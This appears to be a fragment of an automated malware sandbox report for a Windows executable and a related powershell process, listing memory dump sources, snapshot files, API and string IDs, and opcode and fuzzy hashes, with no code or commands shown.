                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                        • API String ID: 3580290477-1581088161
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7e97badaa0ccaea44ec8ca81f79f4ba403a3b2c33def53094e1d1ff2d40dba6a
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2417E72A08F1686EB14DF29A8900BD67A6EF847D0B9541B5EF4EC3B95DF3CE4818300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-2766056989
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 28e1e0f857556d647b9106a00d1fe80f73a9c471021f4b8bba851b4c0d99da9f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8b133f299e82c7afc847d04c793c36d20fed2a0fd48748503ca682fb3f5610b0
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28e1e0f857556d647b9106a00d1fe80f73a9c471021f4b8bba851b4c0d99da9f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E416BA1F0F6838AF7168B35A8B09752790AF56790F844239DC6DC63FDDF2CA8849640
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8b2636ecf5a37c6a28ec54cecb3cde6a02ebede1cd60dc86711ab11c39cbc8b5
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C241C232B18B9581DB608F29E8443AA67A5FB98784F844135EF4DC7798EF3CD441CB40
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-402823876
                                                                                                                                                                                                                                                                                                                        • Opcode ID: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 242a78352c5aad2ea2f56845450c5479741c0561a32dce5739c104c6c1cb3b64
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0831B220B09A8242EB59AB75D865BED23D0BF48748FC841B6DD7C477CADE2CD6458310
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Time$System$File
                                                                                                                                                                                                                                                                                                                        • String ID: gfff
                                                                                                                                                                                                                                                                                                                        • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                                                                                                        • Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                                                                                                        • Instruction ID: a1cedf13682012cd69de266e0e92eef165f0e82111ba3beb34c03ea84ef170c6
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E621D772B0864685DB58CF29E42077976E4EB8C7C4F4480B6DA5DC77A9DE3CE1458B40
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                                                                                        • Opcode ID: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
                                                                                                                                                                                                                                                                                                                        • Instruction ID: fcb5bf7002bc9c5c43ccbfa54844a0bbe3d333a9f6fcb63af7fcece02c784686
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E21F872A08A4181EB649B19D44427D73B2FB84B44F858279DF8DC3694DF7DD548C741
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 580b3386c56f74526aea9c4e6018cf4d7d0a842e23dddda4bd2515111dc8cf6b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B111C32618B9182EB618F19F840259B7E5FB88B88F584270DF8D87768EF3DD555C740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 66112ebc79a8769491d7d8a4283cd90d670ab3743ab5ce09253566f55c7b284a
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C901F22291C76386FB64AF68986127E23A0EF49744F800176DF4CC3681EF3CE440CB08
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Time$System$File
                                                                                                                                                                                                                                                                                                                        • String ID: gfff
                                                                                                                                                                                                                                                                                                                        • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                                                                                                        • Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 31c460e0f67e3d0eef8beca7faceb8466585109c64c2b39be4a1916c6cd67518
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09012BE2B1854542DB54DB65F8115557790FBCC7C4F449032E69DC7799EE2CD2018700
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2014004563.00007FFD9A420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A420000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ffd9a420000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3f63c017c9953d24752fe73b9f176d5576941d43ad15d7c0ba17771eedae7454
                                                                                                                                                                                                                                                                                                                        • Instruction ID: f182826b5a86f7bd773fe828fd35fc6f1e0061753661c6bee76b1e908590f15e
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f63c017c9953d24752fe73b9f176d5576941d43ad15d7c0ba17771eedae7454
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DD14923A1EAC94FEBA9DBA848755B5BF90EF16314B1801FFD45DCB0D7DA18A805C341
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.1998500974.00007FFD9A23D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A23D000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ffd9a23d000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 16ae7d8a2bd9b491e0ba64b15793c28b58e14358f2a523ce2369992dd0e9a9cc
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5bdd1b9516618e156de9c61f8d9784627dded564a82729951a3bec809d443fa8
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16ae7d8a2bd9b491e0ba64b15793c28b58e14358f2a523ce2369992dd0e9a9cc
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5041157150DBC48FE75A9B3998559523FF0EF53324B1905DFE088CF1A3DA24A84AC7A2
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b5e15530e02bba3b891627c36859d7c6f40f923ef12485c7ddaf88188931c249
                                                                                                                                                                                                                                                                                                                        • Instruction ID: db5314d6a5755a59aece31d4b1cbc1673693e2a8d7d941d5c04b724b84caef71
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5e15530e02bba3b891627c36859d7c6f40f923ef12485c7ddaf88188931c249
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2831D231A1CB884FDB1C9B5C98466A9BBE0FB99311F00426FE45DD3292CA70A855CBC2
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: c5f9bbaeb3b41cb968decf4eeb75acf2d172c355ad8f93a03f87dd5b435847c0
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 48cb322e9acc7ce9e3fded08824dc607cfdc72af5a3140e7b92c1727ce045925
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5f9bbaeb3b41cb968decf4eeb75acf2d172c355ad8f93a03f87dd5b435847c0
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2421283190CB8C4FEB59DBAC9C4A7E97FE0EB96321F04416FD448C7152DA74A41ACB92
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 81fbdc8ecff24231877c89f91e47388293c1632b54fd1116edb9c02ed6a8aae5
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 23b7913df232a9141db2daccf8508c0ef482e7380b33fcee096b2626df1438e8
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81fbdc8ecff24231877c89f91e47388293c1632b54fd1116edb9c02ed6a8aae5
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E218162A0E3D14FE7175BAC98B20E53FB0DF4322470E11EBD4C98B4A7D91A684AC795
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9100e53536d32808e974d7d27de713845656aa507fe9fee0e2e00853a6d84115
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7301A73121CB0C4FD748EF4CE451AA5B7E0FB85324F10056DE58AC36A5DA36E882CB42
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2014004563.00007FFD9A420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A420000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ffd9a420000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 15fc3b74948afd3aacabb71e663b11ea32b2b4193fa9768fa52106e0430c21ff
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 88f9877ee03809f7bb0d7f649003447239f600d7d98077b2459d45da05403a40
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15fc3b74948afd3aacabb71e663b11ea32b2b4193fa9768fa52106e0430c21ff
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EF09A32B0C5058FD7BCEA8CA8558A873E0EF4432071100BAE15DC70ABCA25EC41CB81
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
